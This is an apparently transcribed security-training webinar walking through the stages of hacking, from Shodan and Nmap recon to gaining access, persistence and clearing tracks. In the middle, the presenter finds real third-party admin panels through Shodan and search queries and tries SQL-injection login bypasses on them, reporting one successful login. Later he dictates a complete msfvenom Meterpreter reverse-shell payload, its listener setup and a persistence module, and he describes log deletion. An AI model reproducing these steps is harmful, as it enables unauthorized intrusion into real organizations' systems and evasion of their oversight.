everyone. A very warm welcome from CyberSapiens to everyone present here at today's webinar. I'm sure that in the duration of this session, you might have various questions related to today's webinar topic or otherwise. Please post your questions in the link that we have shared so that I will attend to it at the end of today's session. All right. So this we must do in order to stick to the schedule. I will be glad to attend to your doubts and queries at the end of today's session. Once again, a very warm welcome from CyberSapiens. I will be your host for today's session. We will start off with a short introduction about me. First off, as you can see on the image displayed on the left-hand side over here, the output of the Who Am I command in the administrator command prompt terminal is Eve/Ali, where Eve is the name of my PC and Ali is my username. So I'm Ali J. I'm a cybersecurity analyst at CyberSapiens. My daily duties involve carrying out red team or VAPT assessments on client targets that are assigned to me and constantly updating my knowledge and skill. I collaborate with the amazing team here to bring security and peace of mind to our clients. I also handle mentorship duties for cybersecurity interns and trainees here. As for my background, I'm an ex-mechanical engineering student from PES University in Bangalore. I'm a graduate of Forensic Science Honors with my majors in digital forensics and cybersecurity from Jain University. I'm a certified ethical hacker, version 11. I'm essentially a problem solver with anxiety, which makes you want to solve your problems faster. And besides issues with computers, I can also somewhat fix electrical, plumbing, woodwork, or vehicle related issues. My friends called me Sasta Sherlock Holmes or Cheap Sherlock Holmes to make fun of me. Personally, I love computers, bikes, I love gaming, and glitch art, and code is like art and poetry to me. Okay, I like to call myself a jack of all trades and a master of none. And that phrase is actually incomplete. So you can look up the complete phrase if you feel like it. Hunting bugs and cyber criminals is something I do all day long. Sometimes I lose track of time. More than an expert, I consider myself a learner still, which is the attitude that you must adopt in this field. In this field, you will be routinely mind blown and humbled by everyone else's achievements. And you will be left wondering how these people's brains even work and how can someone even think like that. And new things are being created and added to this field every single day. Now the names of roles and jobs in this field has intertwined and we can include multiple responsibilities and there are multiple subcategories for each role as well. Therefore, above everything else, I am interested in learning things and solving puzzles. So that was about me. Now about my team. Who are we? As for my organization, CyberSapiens, we are based in Bangalore, Mangalore, Dubai, and Australia. We are a close knit team of like minded problem solvers, troubleshooters, and crisis handlers. We make sure that our clients don't walk away with any vulnerabilities, be it on their networks, systems, devices, infrastructure, software, and applications, or their overall organization through offensive security testing. With this, we ensure that businesses are resilient against attacks from outside and from within. On the side, we also provide comprehensive internships for individuals wanting to start out on their cybersecurity career. And we provide training in various different disciplines in cybersecurity to all interested individuals, working professionals, and employees from various backgrounds and organizations. So that was a quick introduction about me and my organization. And now we will look at the purpose for today. CyberSapiens presents to you this webinar, the goal of which is to give you a very broad glimpse of the behind the scenes processes that are involved in what we call hacking. I would like to request everyone to please turn off the mic during the session so that there is no disturbance. Yes. As I was saying, the goal of today's webinar is to give you a broad glimpse of the behind the scenes processes that are involved in what we call as hacking, the different stages involved in the hacking process. This is in order to spark your interest and ignite your curiosity in the field of cybersecurity and to spread awareness to help you understand how hackers approach their targets. This is important in order to understand what kind of precautions you might need to take to protect yourself based on your assets and data. So let's move on to today's agenda. First, we will take a look at the general overview of ethical hacking, followed by the various stages and methodology involved in the processes. Finally, we will have a round of question and answer to discuss the various questions that have been posted. Now that our agenda is clear, we will start off with an overview of ethical hacking. First up, let's talk about what exactly is ethical hacking. Hacking generally means solving a problem. I'm sure you're familiar with the term life hack, which is basically a creative way to solve a problem in life. Now, in the world of cybersecurity, hacking can mean different things. Hacking in cybersecurity can very fundamentally mean the act of gaining unauthorized administrative access, command and control of a remote machine. It can mean taking down a website or web service. It can mean affecting or compromising in any way the confidentiality, integrity, or availability of your target and their data. So, in relation to cybersecurity, if you are able to point out or exploit vulnerabilities or bugs in your target, then you are a hacker. Okay, so when you become a professional hacker, you are referred to as a penetration tester, where you attempt to bypass and test the system security of your target with their knowledge and mutual understanding. It is an authorized practice where you test on your target, you document and create a comprehensive report of the vulnerabilities, bugs you come across, and to help your target understand the possible impact of the particular vulnerabilities. All right. So that's your job. After that, you work with the target to implement mitigation measures, which can include anything like updating their systems or updating their firewall rules, adding secure headers, various things based on what vulnerabilities are there. And your motive here is not to affect the target in a negative way. Your motive as an ethical hacker is to improve the security of your target. Now, let's take a look at who is an ethical hacker. Before that, let us take a glance at a few different hats in cybersecurity that we will come across. We have black hats, these are malicious hackers and criminals. Then we have the green hats. These are what we call newbies or new learners, people who carry out hacking with publicly available and open source resources and scripts. And they might make mistakes like leaving traces or causing either outage or widespread damage unintentionally or intentionally. Then up next is the red hats. These are hackers who are like digital activists or vigilantes. They use their hacking knowledge to convey a message. Their reasons for hacking might be politically, socially, religious, or ideologically motivated. All right. Then we have the blue hats. These are external contract basis hackers that are hired by organizations to test their products before launch. It is a subcategory of ethical hackers. And then we have the gray hats. These are security experts who may sometimes violate laws or typical ethical standards, but usually do not have any malicious intent. Finally, we have the white hats, and these are your ethical hackers. Just in case you noticed in the title, who is written differently, which is used to denote an internet record listing that identifies who owns a domain and how to get in contact with them. That's what who is. Now, let's talk about the behavioral traits of an ethical hacker. An ethical hacker is someone who has a bypass and loophole mindset, which means that they can see the flaws in the logic of things in life. They can point out loopholes in any kind of system, not necessarily technical. It can be in any regular life situation. Okay. An ethical hacker is someone who can quickly learn new concepts because new technologies, exploits, and softwares are being developed every single day, and they need to be able to point out vulnerabilities in them. Then they need to be really good at research and analysis, good at observing and recognizing changes in patterns, changes in the data. They need to be ready to hit the documents and source code of technologies in depth. They need to be ready to reverse engineer the source code and analyze it to find out hidden flaws. They need to be problem solvers and critical thinkers with a lot of patience, and they need to have reflexes and the ability to make the right decisions in critical emergencies, which might affect the security of sensitive data of people and organizations. So, these are the traits of an ethical hacker. Now, let us look at what role do ethical hackers play in the cybersecurity process. Now, consider that there is an organization that needs to secure their systems. In the security team, ethical hackers play the role of the red team, whose job it is to simulate a real-time external attack on the organization in order to find out vulnerabilities. They can carry out these attacks either remotely, or they can even visit the premises and carry out these attacks in premises in order to see the readiness of the employees and the overall security posture of the organization. Then they prepare and share the reports on these vulnerabilities. On the other hand, for large organizations, we have something known as the blue team as well. This team consists of network security engineers, admins, and firewall engineers. They carry out monitoring and logging. They give security checks and updates in the organization systems, and they spread awareness amongst the employees. In very large organizations, both the teams report to the purple team, which coordinates the timings of the exercises that are conducted by the blue team and the red team with the organization. Then they report to the decision makers or the management of that particular business or organization, and they analyze the reports. And this helps businesses take informed decisions to improve their security posture. This concludes our overview of ethical hacking. Let us now move on to the main concept of today, that is the actual stages of ethical hacking. Before we start off with the actual stages of ethical hacking, let us take a look at a couple of standard accepted attack methodologies which define the steps of compromise. First up is the MITRE attack framework. This framework is a set of tactics and techniques that are used by adversaries or threat actors. It was designed to improve the detection and response capabilities, and it was used to help understand at which stage a current threat is when it is detected. Okay, like which stage of compromise. It was developed by the MITRE Corporation, which stands for Massachusetts Institute of Technology, Research and Engineering, and ATT and CK stands for adversarial tactics, techniques, and common knowledge. Shown in the image here are the different steps and stages that are involved. As you can see here, it involves reconnaissance, discovery, credential access, resource development, initial access, lateral movement, execution, collection, persistence, command and control, privilege escalation, exfiltration, defense evasion, and impact. These are the various stages of compromise. So that was about the MITRE attack framework. Let us look at another standard attack methodology, and that is the cyber kill chain methodology. This was developed by Lockheed Martin, and this is a framework that outlines the stages of a cyber attack from initial reconnaissance to actions on the attacker's objectives. This helps organizations defend against cyber attacks. Okay. So first up, we have reconnaissance. which is the information gathering phase. We have the weaponization phase, the delivery phase, the exploitation phase, the installation phase, followed by the command and control phase, and then we have actions on objectives. So that was a standard attack methodology that we will discuss today. Now we will move on to a more general overview of the stages that we have seen in the previous attack methodologies, and that is the stages of ethical hacking. The general stages of ethical hacking, according to the ethical hacker, the certified ethical hacker methodology, are as follows. The first is reconnaissance, followed by scanning and enumeration, gaining access, maintaining access, and clearing tracks. We will look at each of these stages in more detail. Let's talk about stage one, that is reconnaissance or recon. Reconnaissance or recon is a military term. It is, when you analyze and survey your enemy to get information about their positions and movements in the battlefield. In the physical world, we use snipers or drones or satellite footage to carry out recon of the enemy. In the digital world, we use various different tools and functionalities. During recon, we try to carry out the act of gathering information, okay, followed by creating a map of the target and its assets. These assets can be anything. It can be their services that are hosted, it can be their devices, their networks. All right. Then we want to find out what technologies are being used by the target and what are the versions of these technologies. All right. Then we need to determine the attack surface. These attack surfaces can be anything. It can be email systems, which can be attacked through phishing attacks or malicious attachments. It can be web applications. It can be network devices, can be endpoints like laptops, desktops, mobile devices. It can be cloud services. All right. So this is what reconnaissance is. Now, let us look at the types of reconnaissance. The first type of reconnaissance is passive recon. Passive recon is when you try to get information from your target without any direct contact. You don't want the target to know that you are watching and analyzing them. This is your stealth mode. You will use OSINT or open source intelligence and publicly hosted third party information services. More on OSINT shortly. As you can see in the diagram here, the attacker tries to gather information about the target network through the internet via publicly available services that gather information from all sources and networks. Let us take a look at the key objectives that we are going to follow during this stage. The first is that we need to find out all the domain names and IP addresses. The second is we need to understand the network infrastructure. We want to create a map of the target network. We also use publicly available competitive intelligence tools such as Wapalizer or even stock market data or other such public records and listing forums. Because we want to understand the technologies that are used by the target, their programming languages, their applications and softwares, all right, and their technologies and what platforms are being used. Let us look at a few different tools that we will use to carry out passive reconnaissance. First up, we have Whois and DNS lookup tools. We have Google or GitHub doc methodologies. Then we have open source information, publicly available information services like Shodan and Census. And then we have a few different, command line tools, followed by final, that is social media platforms. You can get information about what technologies are being used, what softwares are being used. All right, all of these tools is what you will use. So allow me to demonstrate the process of carrying out passive reconnaissance. Just stand by. Okay. So now that we are in my browser, we will visit the website. The first one that I want to discuss is the OSINT framework. OSINT stands for Open Source Intelligence. And if you visit this website, you can uh, get resources, and you can get direction on how to carry out your open source intelligence. As you can see here, it says username. If you click on this, it leads you to username search engines, and you can see that there is a few different username search engines used here. Similarly, for domain name, what tools you can use, these tools are mentioned here as well. All right. And for each activity and for each particular artifact that you need to look for, there are various different tools given, and you can make a good use in order to carry out your OSINT. Okay, so this is one resource and reference website. Okay, then we will move on to Shodan search. Let me now talk about Shodan. Okay, so Shodan is a search engine for the Internet of Things, like how Google indexes devices that are connected to and facing, like how Google indexes web content and web pages. Like that, Shodan indexes the devices that are connected to and facing the Internet. It gives information about those devices. So let us try to enter and let us try to understand how Shodan works. Just give me a second. Just stand by. I'm facing an issue here. Okay. So first up, we will try to enter the IP address of a particular test website. All right. Let us say the test website is testphp.oneweb.com, and we want to find out the IP address of this website. Hold on. Okay, so this is our test website. Now we want to find out the IP address of this test website. In this case, I will just use a tool called Burp Suite. Just give me a second here. All right, and allow me to just refresh this page. Okay, so here you can see that I've got the IP address 44.228.249.3. So let me head back to Shodan and search for this particular IP address 44.224. Just let me re-verify it once again. Hold on. 44.228.249.3. 44.228.249.3. And let us search. Just give it a minute and allow it to load completely. Okay, hold on. Just let me disable my burp tool. Yeah, so you can see that in the output of Shodan, when I have searched for this particular IP address of this test website here, you can see that it gives some general information okay, some host names, and from here you can find out that this particular IP address is using Amazon Web Services to host, and then you can find out any open ports and services. Okay, just allow me to just give me a minute. Allow me to browse and find out if there are any other IP addresses being used. You can see that for test PHP, wait, hold on. I need to switch on my burp proxy again. Yeah, 4444.228.249.3. Yeah, so in this case, we are just getting some basic information about these open ports. Okay, if we click on this open port, you can look for, particular devices or particular services that are being hosted. Now, if you need some help to search your Shodan docs, you can, use a reference, which I will use right now. I will head over and just type Shodan docs here. All right, just give me a second. Yeah, let's just visit the Security Rails website. You can, for example, you can search for particular technologies that are running. You can search for particular, web page content. Okay, you can look. It's somewhat similar to Google Docs. Okay, so meanwhile, this loads. Just give it a minute. Allow me to move on to Google Docs. Okay, so what is Google Docs? Google Docs is a way of searching Google, okay, using some special dark queries, okay. Your dark queries are, basically your uh, you use specialized search operators, okay. You use, for example, if you want to look for a particular thing like a URL that gives you an admin login page, okay, an admin login panel. So you can just type in URL, okay, followed by a colon, and then you can type admin.php. All right. So let us search. Meanwhile, we have got a few of our Shodan docs here. You can see that you can search for databases, exports, DNS servers. All right. So let us go through this. Yeah. So for example, if you want to find your MySQL powered databases, you can use this particular Shodan doc. Okay. Let us copy this, head over here, back to Shodan and search. Yeah, so you can see that in the results, it has given all the possible, results that have this particular thing attached to their URL. Okay, so if you can choose to visit any of these, let us log in here. Let us try to visit this particular thing. Yeah. So yeah, it has led us to a login page. Okay. Now what we want to do, from here, what we can do is we can probably carry out some kind of, attack here. Now, if for example, there is a type of attack that is called an SQL bypass or SQL authentication bypass, wherein you will use an SQL injection, okay, or an SQL statement in order to bypass this login panel. Okay, so let us try to bypass this login panel. Let me enter an SQL injection statement that says one dash or one dash or wait, hold on, let me enter it in the email field. One dash or dash one dash equals dash one. All right. So this is what we call an SQL injection statement. And let me paste it in both the fields here and try to log in. Mm, all right. Let me just type admin here and try to log in again. Okay. So in this case, we are unable to log in. Let me just try once again. I'll just disable this. All right. Let me just try another payload. Hold on. All right. If not this, I can try another website here. Like for example, I have a test website that is http colon slash slash www.bljthailand.com slash back office slash website. Okay, even in this case, we are unable to access this particular website. However, if you do want to carry out an SQL injection, since I have, uh, you know, uh, yeah, since I have tried to, display how you can find your targets using your Shodan search. All right. So, and how you can find your targets using your Google Docs. All right. So yeah, let me try to find another target that we can use to test on. Let me try. Um, just hold on. Let me try the same website again, but with a different thailand.com slash. Okay, wait. Just stand by and allow it to load. Okay, so here you can see that this is another, administrator login panel. And let us try our SQL authentication bypass over here, or dash one dash equals dash one. Let me try this for the password as well. Need to fill up a captcha. Okay. So you can see that you got logged into the administrative control panel of this particular website. So that is how you can use Google Docs, okay? And that is how you can use Shodan. If you look at the Shodan results, since we used MySQL port, colon 3306. Okay, here we want to find out all the devices that are running my MySQL server on the port 3306. Okay, so you can see that in the output there's a list of devices given here. You can visit any of these devices, any of these results in order to get more information about it. Okay, like for example, your open ports, okay, your services running on these ports. As you can see on port 22 TCP, there is an open SSH service running. Okay, similarly at 3306, there is a MySQL server running here. So this is how you will look for information through Shodan. You can find, sometimes you can also directly find, for example, if we type product as, say, Hike Vision IP camera. Okay, let me search for this particular thing. Okay, so this gives you a list of all the IP cameras that are facing the internet along with their version details, okay, their software version related details. All right, so you can visit this and get more information about this. You can even directly try to visit this IP address. Let us try to visit this IP address and see what's over here. All right. So this is probably a login page for an account that has Hikvision IP camera present there. All right. So yeah, that is how you will carry out your passive recon. Another tool that is similar to Shodan in its functionality is your census tool. So this is another similar tool where you can, probably search for um information, okay, about a more detailed information about your, target uh, from your IP address, or you can enter a domain name. All right, you can enter different uh, things here. All right, and based on that, you will get the similar output. You can see you have gotten some basic information, okay, routing details, and then you have also got a small map of the general area it is in. Okay, it says it is a Hikvision web server, and you can get some banner related details. You can get the server, like the different ports, okay, and the different services that are hosted on those ports. All right. So with this, you will be able to understand how to carry out a few other different online tools that you can use to scan the target without actually interacting with the target are, like, as you can see here, nmapper.com. Okay, this is an online tool which scans the network and it helps you, to get information. The information that you will receive will be similar to your Shodan or your census output. And yeah, we will also look at how the main tool that is called Nmap works shortly. All right, then we also have another, tool, online functionality that is called urlscan.io. And if I enter a domain name here, I can, change the settings to a private scan, and urlscan.io will scan the website for us and give us some information related to it. Let us try. Okay, I missed one there. We need to clear the captcha. Okay, so this is going to take a couple of seconds to finish. Then we have another tool called What CMS. Okay, so this helps you understand what is the content management system that is being used, or what is the content delivery network. For example, if the website is hosted on WordPress, all right, or if it is hosted on Hostinger, okay, or various different technology that you can get. Now, let me enter the same thing over here, Amazon.com, and I will click detect CMS, and it will check it for you and give you an output. Meanwhile, back to the URL scan.io tool, we have got some information our um, about Amazon.com. So you can see that uh, some domain and IP related information is given here, and then you can visit some HTTP transactions that were detected. Okay, it will also give you a list of resources or assets that were called. Okay, and you will get the response codes. Okay, you can also visualize the response that comes here. Then you will also get redirects, links that are present, outgoing internal links that are present on Amazon.com main domain. All right, so this is how you can utilize your URL scan tool. Besides that, we have your whois domain lookup. Okay, let us enter the same name here, Amazon.com, and let us carry out a domain name lookup. And this will give you some details about who is the owner of the domain. Okay, what are the expiry date when it was registered, what are the contact details of the domain owner. All right, then your administrative contact details, various different things. All right, so yeah, this is your raw whois output. You can also use this as a command line utility tool, which we'll look at shortly. All right, and here you can see that you got a few different name servers for Amazon DNS. Okay, and then we have another tool that is called the MX lookup tool. Here MX stands for your mail exchange, which is one type of a DNS TXT record. You will have various DNS TXT record that contain details about various domains. Okay, so here as well, we will enter the same domain name and try to understand what kind of information we are getting. All right. So yeah, this is some information. Just give it a couple of seconds to load. So yeah, all of these tools, so you can see that the host name, okay, is it has found a host name amazon-smtp.amazon.com. That is your mail exchange uh, endpoint name. Okay, and this is your SMTP test. Okay, and you have received an IP address, and you have received some information about the DNS TXT records that are present. All right, so this is how you will carry out your what do you say, passive reconnaissance in order to get as much information as you can. Now, besides this, you can also visit your what do you say, um social media websites. Okay, these social media websites like LinkedIn or Glassdoor, they also give you a lot of information about what kind of technologies your target is using. Okay, what kind of softwares that they may be using. Okay, what are their products? All of these things you can get information about by going through social media. All right. So that was our passive reconnaissance. Now we will look at, just hold on, active reconnaissance. So active reconnaissance is when we want to carry out direct contact with the target in order to gain, what do you say, in order to gain information, in order to gather information. So yeah, here we don't really care about being noticed by the target. All right, in this step we basically want to understand the structure of the target system, we want to judge their security posture, and we want to find out what are the vulnerabilities that are detected. So over here you can see that during active reconnaissance, the attacker may directly ping or contact the target systems and devices such as routers or servers that may be hosting services. So this means that our interactions may show up on the targets, logs, and systems. But at this stage, we don't really care about it, or we have taken measures to remain anonymous. So during this stage, we want to complete our understanding of the structure of the target and possible vulnerabilities that are detected based on the technologies that are being used and the type of target, like whether it is an email server or database server or application server or authentication server, etc. So yeah, now we will look at the key objectives of your active reconnaissance phase. Here we want to identify the live hosts. In networking, a live host refers to any device that is right now connected to the network and it has a unique IP address. It can be a computer, it can be a server, it can be a printer, or any other device that is capable of transmitting or receiving data over a network. Now, ports are logical or physical ports that are present on devices, and different types of services use different types of ports. Besides that, the kind of information that we want to gather will remain similar to the passive reconnaissance phase. All right, it will include gathering information on the versions, okay, their configurations, their system and network configurations. Okay, we will try to enumerate the user groups. All right, we will try to identify the possible security measures that they have deployed. For example, if they have deployed load balancers or they have deployed firewalls, this we want to identify what are the security measures in order to proceed to the next step, that will be to bypass these security measures. Now, the tools that we will use during active reconnaissance will be mainly Nmap or Wireshark. Okay, then we will also use Burp Suite or OWASP Zap. We will use scanners like Nessus, Nikto, or OpenVAS scanners. Then we will also use Netcat or packet analyzers. So let us now take a look at a few of these tools. Just give me a second here. All right. So first off, let us take a look at Wireshark. Here you can see that this is your Wireshark graphical user interface. So what this tool does is that it basically, allows you to, capture the traffic, your network traffic, okay, and it allows you to inspect what kind of, information is coming and going. It allows you to inspect the packets of data. So this tool is known as a network protocol analyzer. All right, and it gives information about whatever data is being transmitted over a network in real time. And you will also get detailed insights into the network traffic. For example, if I click on this Ethernet capture, okay, let me double click on this. Okay, so this is giving you the various different packets of data that are incoming and outgoing from my current internet connection. All right, you can see the time is given here, the source IP address, okay, the destination IP address of the packet, okay, the protocol, the length info, and then here you can see the decoded data as well. In this case, it is uh, your hex data, and you can try to understand. And if, for example, your this connection, I think it may be using HTTPS. So that's why we may not be able to see the data. But in this case, we can see some values are being, sent in plain text. All right. So this is a particular vulnerability. It means that your connection is not secure. But if you're not able to understand the information that is given here, then your connection is encrypted and it cannot be um, seen by someone who has access to the network. Okay, so here you can see that various different protocols are being used, uh, all the information about the packets. You can basically perform packet inspection. So that is about your Wireshark tool. Okay, this tool is used to monitor the network. And in case there is any suspicious activity, like if, say, for example, someone is trying to, uh, access a particular web service, then it will show up over here, and you will get some information about what happened in the interaction, what kind of data was received, all right, and you can analyze it. So that was about our Wireshark tool. Now, the other tool that we are going to visit is your Kali Linux tool, that is Nmap. So just give me a minute here. I will access my Kali Linux virtual machine and allow me to type clear here. Okay, so in this case, I have, accessed my Kali Linux virtual machine, and then I have run the command sudo su in order to get the root user access. And now, we can use our Nmap tool. So let me first type nmap-h. All right. So when you type -h, you get a list of all the options that you can use with this tool. Okay. So yeah, you will get network related information about this. So let us take a look at this right now. Let us use nmap command to scan a target for network related information. Okay. So hold on, just give me a second here. All right, so let us select a random IP address. In order to do that, I will need to visit my browser and try to I will just select this particular IP address. Okay, I'll copy this, head back to my virtual machine. All right, okay, and then I will type nmap dash uh, a basic command sp, that is your ping scan. Okay, so I will do that. Let me paste my clipboard. Okay, that is the IP address. All right, now we will do the nmap scan. Okay, in this case it is saying that there is a um, there must be an even number of them. All right. So yeah, I don't think it is able to access this particular IP address. So in this case, let me try to find an IP address of another website, another test website that we will use. That is testphp.oneweb.com. Let me search here. Okay, so yeah, we got a couple of, we got a few devices. Okay, so let me use this particular IP address. Just hold on. Oh, wait. Oh, I think there's some issue with the keyboard. Just give me a second here. Okay. Okay, in this case, I don't think this is a valid IP address. I need to enter a publicly available IP address. All right, so let me just visit here. Okay, and I want to find out. Okay, let me see if I can use Nmap using the domain name. Okay, So I will put Nmap. Over here, we'll need to add dash D in order to specify a domain name. Just give me a second here. Okay, can pass host names and IP addresses. Okay, okay, dash SL is the name of the ping scan. Okay, so let me try it once again with the correct syntax. Okay, so in this case, uh, we have done a SN scan. Okay, so this is will give you the service name, or it will tell you a basic scan. Okay, and it is saying that the host is up. Okay, which basically means that there is one live host. And now you want to find out the particular service version that is being used. So then you will use nmap dash sv, okay, to carry out your service version scan. Okay, and along with that, I will also add dash o in order to enable the OS detection scan. And then I will add dash A in order to enable the aggressive scanning mode. Okay. And yeah, then I will enter the same IP address. So it's going to take a couple of seconds to give your output. Just give it a minute here. Okay. Meanwhile, this output is being generated. We will move on to the further stages. Okay, just give it a minute. We will revisit this shortly. So yeah, we were on the key objectives and the tools that are being used during active stage, active reconnaissance. Now, what happens here is that you can show up on the logs of your target, as I was saying, and yeah, you are basically making direct contact and pinging the target in order to get information about it. All right. So yeah, then we'll move on to the next part or the next stage, that is scanning and enumeration. So your scanning and enumeration stage is basically a stage that is a continuation of your uh, first phase, that is your reconnaissance phase. So in this phase, we are trying to get the similar information. It is basically a continuation. We want to find out the open ports and services, the versions and configuration, the network topology. We want to enumerate the users and groups, and we want to identify the security measures. Okay, so it is, as you can see, the various objectives here are similar to the previous stage, and the tools that are being used are also similar tools. Okay, so yeah, this is what your scanning and enumeration phase is. So let me try to carry out another simple nmap command. I think we have not yet received the output of our previous command, so we will wait for that to give us the output. Meanwhile, we will continue with our um, stages of ethical hacking. All right. Uh, then we have the next stage, that is gaining access. So gaining access is your main and your most difficult phase. Okay. And in this phase, we will be trying to actively test on the vulnerabilities here. Okay, we will be trying to actively engage with the target and carry out activities like brute forcing or fuzzing. Okay, And yeah, it's basically we are trying to, our ultimate goal in this particular phase is to analyze the gathered information. Okay, then we want to exploit the identified vulnerabilities. We want to penetrate the system's defenses that are there, and we want to gain administrative access. So yeah, this is the goal of our gaining access stage. Okay, so admin or root privileges is the highest level of control on any computer system. It allows the user to make system-wide changes, install or uninstall software, and access all files and settings. A normal user will access the functionality of the device. An admin will have the access to the entire system along with security settings. So this stage will test your scripting and your programming language and coding skills, mainly your ability to understand and write executable code. Okay, so these are a few of the tools that are used to carry out your gaining access stage. So we will have a short practical demonstration of this. Okay, meanwhile, we will move on to the next stage, that is your maintaining access stage. So this stage is mainly about persistence. Persistence is an activity or an act that allows you to, once you have gained access and compromised a target, it allows you to, continue your exploit even after the target has rebooted, or even after the target has disconnected and reconnected. Okay, and here we want to evade the detection during this stage. We want our activities to be undetected. We want to establish a communication channel. Okay, like for example, a backdoor that provides us unauthorized access to a computer system, and it can allow us to control the system remotely without the user's knowledge. Okay, and then we have to move on to our objectives, that is to gather and exfiltrate data. So the key objectives during this phase will be to deploy your persistent.
Hello, Ali. Your mic is not working, I guess. You're
Okay, is my mic audible now?
Yeah, it's
Yeah, it's
working now.
working fine.
Okay, okay. So yeah, could you tell me from which part I was not audible?
Just the past 20 seconds.
Okay, okay, fine. So yeah, as I was saying, the key objectives of the maintaining access phase, okay, are to deploy our persistence mechanism, evade detection, maintain communication with the target, and adapt and evolve. So yeah, then the tools that you will come across during this phase are your backdoors, rootkits, okay, your rats or remote access trojans, okay. Then you will use fileless malware. Fileless malware is basically a type of malicious software that operates in memory and it leaves no trace on the disk. So this makes it difficult to detect using any traditional antivirus or some endpoint security solutions. And yeah, then we have scheduled tasks and cron jobs. So these can be modified to automatically run or execute at specific times or intervals without requiring any manual intervention by the user. Okay, and then we can use modified startup scripts to make sure that during startup, our program or the exploit that or the payload that we have delivered will be executed again as the system starts up. Okay, so that was about maintaining access. Finally, we have the final stage, that is clearing tracks. So during the clearing tracks phase, we want to basically delete any information that may be logged on the target system during our interactions in the previous stages, or else we may get noticed and our cover may be blown. So then we have to delete the logs and we need to clear all our system and network traces. So here in this stage, the key objectives are to delete or modify your logs, clear your command history, evade detection, remove malicious files, and the tools that you will use are mainly your internal system tools like your registry or command prompt. Okay, and then you will use VPN or proxy in order to remain anonymous to the target. Okay, and then you will use your internal system tools, some of which we will not mention for security purposes. All right, there are various open source tools available. For example, a few tools that you may be familiar with are CCleaner or BleachBit or even DBAN, that stands for Darix Boot and Nuke. So it is a USB bootable program which overwrites all the data on the disk. Okay, so yeah, that brings us to the end of the what do you say, stages of ethical hacking. So before we progress further, let us now look at a short practical on gaining access and maintaining access steps. All right. So yeah, first up, we will head over to our virtual machine here. Okay, and then we will uh, hold on. Yeah, we will access our Kali Linux. Okay. And the tool that we will be using in order to gain access is known as MSF or Metasploit frameworks. So Metasploit frameworks is like a comprehensive exploitation tool that you can use in order to carry out exploits. It contains a library of various known vulnerabilities. Okay, so these known vulnerabilities are, can and published exploits, I should say. So you can use these published exploits and test and exploit the weaknesses that you have detected so far. So for this practical, what I will do is, uh, in order to demonstrate the gaining access and exploitation steps, first up I will create a malicious.exe file using the MSF console. Okay, so we will be calling the MSF Venom. Okay, uh, then dash P, and then Windows. Just give me a second here. X64 slash meter preter slash reverse underscore TCP. Okay, then we will specify the L host. Okay, that will be L host equals. Before I do that, let me just copy this command and just give me a second here. I will just run ifconfig command once because I need to find out the IP address. Okay, so let me run the ifconfig command. All right, so over here you can see that um, my IP address will be is 192.168.68.60. Okay, so we will copy this IP address. Okay, and then we will head back to our MSF. No, before I do that, let me visit here and check once if my IP address is the same. Just hold on. Okay, so this is the correct IP address, I think, or yeah, 192.168.56.1. All right, so this is the IP address that we will be using. .56.1. All right, so let me head back to my Kali Linux machine and I will scroll down and clear this. And then I will type the Metasploit command again. That is msf venom. Okay, -p windows /x64 followed by /meter preter /reverse _ TCP, and then I will specify the L host, that is 192.168. No, just hold on, 56.1. Okay, and then I want to specify the port. So the port here is L port equals 4444, and then -f exe -o, then reverse.exe. All right. So this is this is the command that we are going to use to create a malicious.exe file that contains a meter preter reverse TCP payload. All right. So just give it a second. Okay. In this case, it says no platform was selected. So I think I need to uh, just check if what I have entered is correct. Okay, so just hold on. Just give me a second here. Okay. Or I will enter the IP address of the machine. Just hold on. The correct IP address that I need to use is on Ethernet adapter 3. 172.28.128.1. Just hold on. Okay, let me try this once again. Okay, in this case, yeah, even in the previous case, it has saved the file as reverse.exe. Okay, so let us try with this IP address only as well. Just give me a second here. Okay, I hope I'm audible and visible. All right, so yeah, let me continue. Okay, so now, as I was saying, we want to deliver this particular file that we have created by, we want to deliver this file to the victim. So in this case, we will use Python 3, okay, -m, okay, http .server 80. Okay, so we are basically setting up a HTTP server on port 80. Okay, so yeah. Okay, now that this is done, you can see that it is serving HTTP on port 80. All right. So now what I need to do is I need to enter the IP address that we want to now say we want to simulate the victim. Okay. So what the victim does is they visit this particular IP address, and let's say they download a malicious file. Okay. So just give me a second here. I will just go to a browser and visit this particular IP address. Okay, so just give it a minute. Just stand by. Okay, so right now I'm not able to get this. Just hold on. Okay, so anyways, now let's assume that we have hosted a particular website, okay, and the victim has visited this particular website, and that has caused them to download the malicious file called reverse.exe, which we had created. Okay, so now that that is happening, we want to first we have set up the listener port. I mean the serving port, and now we want to run the listener port. Okay, so what we will do now is just a second here. Now, just give it a minute. Yeah, I think there is some issue here. So anyways, let me just continue because I think there is some connection issues over here. So yeah, what is the next command that we will use to run the listener port? Okay, we will use the MSF console -q. Okay, then -x. Then we will use /multi-handler. Okay, then we will add another command to that, set payload. Okay, and here the payload that we want to set is located in Windows /x64. Okay, /meterpreter. Okay, /reverse TCP. Okay, and then we will set the L host again, which will be the IP address of our Kali Linux machine. Okay, because we want the malicious file when it has been downloaded on the victim system, we want it to create a connection. When the victim clicks on that file, we want it to create a reverse TCP connection with us and establish a session. Okay, so then we will enter this command. We'll set L host. That will be the IP address that we used earlier, 192.168.56.1. Okay, and then we will specify the port that is set L host. Just a second here. Okay, then set port L port is 4444. Okay, and then we will carry out the exploit command. So what happens here is if this is successfully executed, okay, then it will start running a listener port. So what happens is when the victim downloads this reverse.exe file and double clicks on it, it will start a meterpreter session. Okay, so yeah, I think I'm facing some error over here. Okay, so yeah, anyways, let me just continue because we are running short of time. So yeah, if the user gets double clicks on this, then on the file, then it will start running and you will get access to the system through a terminal. Okay, and you'll be able to see the user's terminal. And after that, you can move on to your maintaining the access uh, what do you say stage. So what you have to do here is I'm going to suspend this current operation in order to demonstrate the maintaining access part. All right, now imagine or suppose my exploit was successful, okay, and I was able to get the access to the session that was created on the victim's device. Now what I will do is I will within the console, within your MSF console, within the session. First, we will give the command as background. Okay, uh, your background command, because we want to make sure that it is running as a background process. And then we will, carry out the next command that we have to use. That is use exploit. Okay, exploit slash Windows slash local slash persistence. Okay. So yeah, this is the next command that we are going to use in order to uh, you know um, show you the in order to initiate the persistence module, okay, that is present at this location. So what this persistence module does is that even if the user switches off their connection or reboots, it will enable persistence. Okay, then the next option that you would use would be to show advanced options. Okay, advanced options, and then you will set the name of the exe file, okay, using the command that is set exe underscore name. Okay, then we will give the name of the file, that is reverse.exe. All right, and then after this command, it we will want to set the session. Okay, so we will select it and set it as session 1, or whatever sessions are given when you type the um, background or show advanced option command. Okay, and then you will choose the session number. In this case, I will use it as session 1. Okay, and then after this, we will also need to set the path. Okay, so we will set path as uh, 